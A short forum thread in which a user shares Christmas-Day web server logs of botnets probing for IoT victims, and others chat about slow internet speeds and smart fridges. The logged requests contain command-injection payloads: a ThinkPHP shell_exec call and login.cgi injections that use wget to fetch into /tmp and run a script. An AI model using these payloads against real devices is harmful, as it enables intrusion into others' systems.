Forum Discussion

MarkJFine's avatar
7 years ago

X-mas ritual

Two things you can be assured of:
1. Lots of new devices clogging the system.
2. Lots of botnets probing for new IoT victims to infect: [25/Dec/2018:00:26:06 -0500] "GET /index.php?s=/index/\\think\\app/invokefunction_function=call_user_func_array_vars[0]=shell_exec_vars[1][]=cd%20/tmp;wget%20http://;; HTTP/1.1" "Sefa" [25/Dec/2018:02:02:46 -0500] "GET /login.cgi?cli=aa%20aa%27;wget%20http://$ HTTP/1.1" Chrome 51.0 UA [25/Dec/2018:06:58:06 -0500] "GET /login.cgi?cli=aa%20aa%27;wget%20http://;sh%20/tmp/x%27$ HTTP/1.1" "Kowai/1.0" [25/Dec/2018:09:53:16 -0500] "GET /index.php?s=/index/\\think\\app/invokefunction_function=call_user_func_array_vars[0]=shell_exec_vars[1][]=cd%20/tmp;wget%20http://;; HTTP/1.1" "Sefa" [25/Dec/2018:23:20:39 -0500] "GET /cgi-bin/login.html HTTP/1.1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"

Please remember to update your brand new refrigerator's firewall... lol

  • BirdDog's avatar
    Assistant Professor

    Yesterday and last night was pretty horrendous speed wise most assuredly due to the all the new devices and kiddies connected.


    Not to stir the pot but sure glad not me that put the "X" in Christmas. :smileytongue:


    Was a time it was quite common but don't see it much anymore because folks screamed bloody murder.

  • maratsade's avatar
    Distinguished Professor IV

    The speed tanked yesterday -- less than 500 kbps all day, or about 10x faster than dialup... :)


    Right now, 1.9 Mbps.   

  • maratsade's avatar
    Distinguished Professor IV

    "Please remember to update your brand new refrigerator's firewall..."


    In the near future, your domestic replicants will be programmed to do this for you.  Edit: Or maybe Alexa can do it already?  (I don't know, I keep my home as dumb as possible).